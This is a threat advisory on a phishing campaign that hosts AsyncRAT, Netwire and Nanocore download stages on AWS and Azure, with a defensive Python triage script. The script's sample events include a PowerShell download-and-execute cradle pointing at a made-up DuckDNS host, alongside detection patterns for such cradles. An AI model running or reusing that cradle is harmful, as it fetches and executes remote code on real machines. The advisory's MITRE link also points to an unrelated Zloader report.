I. Targeted Entities

  • Amazon Web Services
  • Azure Cloud Services

II. Introduction

Cybercriminals are taking advantage of Amazon Web Services (AWS) and Azure Cloud services to deliver a trio of remote access trojans (RATs), all aimed to collect sensitive information from select users. According to researchers at Cisco Talos, threat actors have been distributing variants of the malware known as AsyncRAT, Netwire, and Nanocore since October 2020, mainly to targets in Italy, Singapore, South Korea, Spain, and the United States.

III. Background Information

The attacks start with a phishing email containing a malicious .zip attachment, but the criminals also have a cloud-based trick that can be used: “the .zip archive files contain an ISO image with a malicious loader in the form of JavaScript, a Windows batch file, or Visual Basic script. When the initial script is executed on the victim’s machine, it connects to a download server to download the next stage, which can be hosted on an Azure Cloud-based Windows server or an AWS EC2 instance,” say Talos researchers.[1]

Researchers say that using cloud services to host the payloads is a decision made in order to avoid detection while cutting the costs of the campaign, since the attackers don’t have to set up their own infrastructure. It also makes it more difficult for defenders to track down the attackers. The threat actor behind this campaign maintains a distributed infrastructure consisting of download servers, command-and-control servers (C2s), and malicious subdomains, researchers said.[2] The download servers are hosted on Microsoft Azure and AWS. These well-known cloud services are used because of the inherent trust the public places in these well-known companies to be secure. Network defenders may assume that communications to an IP address owned by Microsoft or Amazon are innocent because of the multitude of benign communications they frequently see to those providers across multiple services.

Further, the main JavaScript downloader used in this campaign uses a four-layer, complex obfuscation technique in its script. Researchers say, “Each stage of the deobfuscation process results with the decryption methods for the subsequent stages to finally arrive at the actual malicious downloader method. The deobfuscation process is performed at each stage with every next stage generated as the result of the previous stage deobfuscation function.”[2] The batch script has an obfuscated command that runs PowerShell to download and run a payload from a download server on Azure cloud. Obfuscated VB downloaders execute a PowerShell command, which runs and connects to the download server running on AWS EC2.[2] To avoid detection, the attackers use the DuckDNS dynamic DNS service to change the domain names of the C2 hosts. Talos researchers found that the threat actors have registered several malicious subdomains using the service.[2]
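As an added example (not code from the Talos report or from this advisory), the following Python triages constructed process-creation events for the infection chain described above: a script host launching a .js/.vbs loader, PowerShell spawned by that script host with a download cradle or an encoded command, and a DuckDNS subdomain in the command line. The field names (ParentImage, Image, CommandLine) and all sample values are assumptions, not telemetry from the campaign.

```python
import re

# Constructed sample process-creation events (not real telemetry).
# Field names mirror common EDR/Sysmon fields: ParentImage, Image, CommandLine.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",            # user double-clicked the loader
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "E:\Invoice_0122.js"'},   # E: is the mounted ISO (assumed)
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://update-svc.duckdns.org/stage2')\""},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",        # batch loader running PowerShell
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ParentImage": r"C:\Windows\explorer.exe",            # benign control event
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "cmd.exe")
LOADER_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf|bat|cmd)\b", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer"
    r"|\bIEX\b|Invoke-Expression", re.I)
ENCODED_CMD = re.compile(r"-(enc|encodedcommand)\b", re.I)
DYN_DNS = re.compile(r"\b[\w-]+\.duckdns\.org\b", re.I)   # dynamic-DNS C2 hosts


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of the rules an event matches; an empty list means no finding."""
    parent, image, cmd = basename(event["ParentImage"]), basename(event["Image"]), event["CommandLine"]
    hits = []
    if image in ("wscript.exe", "cscript.exe") and LOADER_EXT.search(cmd):
        hits.append("script-host-loader")          # first stage: JS/VBS loader executed
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        hits.append("powershell-from-script-host")  # second stage launched by the loader
        if DOWNLOAD_CRADLE.search(cmd):
            hits.append("download-cradle")          # fetches next stage from download server
        if ENCODED_CMD.search(cmd):
            hits.append("encoded-command")          # obfuscated PowerShell payload
    if DYN_DNS.search(cmd):
        hits.append("duckdns-domain")
    return hits


def triage(events):
    """Pair each flagged event's index with its matched rules; benign events are dropped."""
    return [(i, hits) for i, e in enumerate(events) if (hits := classify(e))]
```

Running `triage(SAMPLE_EVENTS)` flags the first three events and leaves the notepad event alone; the same rules can be pointed at real EDR exports once the field names are mapped.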

The RATs used in this campaign include:

  • AsyncRAT: used to remotely monitor and control computers through a secure, encrypted connection to a C2 server. It also contains a keylogger, screen recorder, and a system configuration manager, which allows the attacker to steal confidential data from the victim’s machine
  • NetwireRAT: a known threat used by attackers to steal victims’ passwords, login credentials, and credit card data. It can also remotely execute commands and collect file-system information
  • Nanocore: a 32-bit .Net portable executable, which was first seen in 2013. The version used in this campaign contains two plugins, called Client and SurveillanceEX. Client handles the communications with the C2 server, and SurveillanceEX captures video and audio, as well as monitoring remote desktop activity.[2]

Talos researchers suggest that organizations deploy comprehensive multi-layered security controls to detect similar threats and safeguard their assets. “Defenders should monitor traffic to their organization and implement robust rules around the script execution policies on their endpoints. It is even more important for organizations to improve email security to detect and mitigate malicious email messages, and break the infection chain as early as possible.”

Miclain Keffeler, an application security consultant at nVisium, noted that the rise in the adoption of cloud technologies has forced a shift in security. This shift also means that cloud providers should ensure that their systems are secure, and Keffeler said it is important for malicious usage of their services to be halted immediately when found. “These kinds of attacks aren’t going anywhere, so it’s important that cloud providers like AWS and Microsoft Azure step in to develop more processes around the notification of malicious use cases — especially given the complex nature of the current threatscape.”[2]

IV. MITRE ATT&CK

  • T1005 – Data From Local System
    Threat actors can search through local system sources such as local databases to find sensitive data prior to exfiltration.
  • T1063 – Security Software Discovery
    Attackers can become aware of which configurations, software, and security sensors are currently running on a system.
  • T1555 – Credentials From Password Stores
    The RAT can retrieve passwords from mail and messaging applications.
  • T1105 – Ingress Tool Transfer
    The payload is downloaded from the C2 server onto the compromised host.
  • T1059 – Command and Scripting Interpreter
    Opens a remote command-line interface and executes the commands contained in the JavaScript files.

For more MITRE ATT&CK techniques, please consult the MITRE ATT&CK table in the attached CPR report: https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/

V. Recommendations

  • Phishing Awareness Training
    Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
    Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
  • Set Antivirus Programs to Conduct Regular Scans
    Ensure that antivirus and anti-malware programs are scanning assets using up-to-date signatures.
  • Monitor Malware
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Implement Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Multi-layered Security Controls
    A multi-layered security system consists of numerous independent controls, each protecting a different operational layer, so that a threat which evades one control is still caught by another.
  • Enhance Email Security
    Increasing email security allows for the detection and mitigation of malicious emails.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/xlo3kyjeye6q44qk3jusm2n1xin9cf32

VII. References

(1) Raghuprasad, Chetan, and Vanja Svajcer. “Nanocore, Netwire and AsyncRAT Spreading Campaign Uses Public Cloud Infrastructure.” Cisco Talos Intelligence Group, January 12, 2022. https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html.

(2) Seals, Tara. “Amazon, Azure Clouds Host Rat-Ty Trio in Info-Stealing Campaign.” Threatpost English Global, January 12, 2022. https://threatpost.com/amazon-azure-clouds-rat-infostealing/177606/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.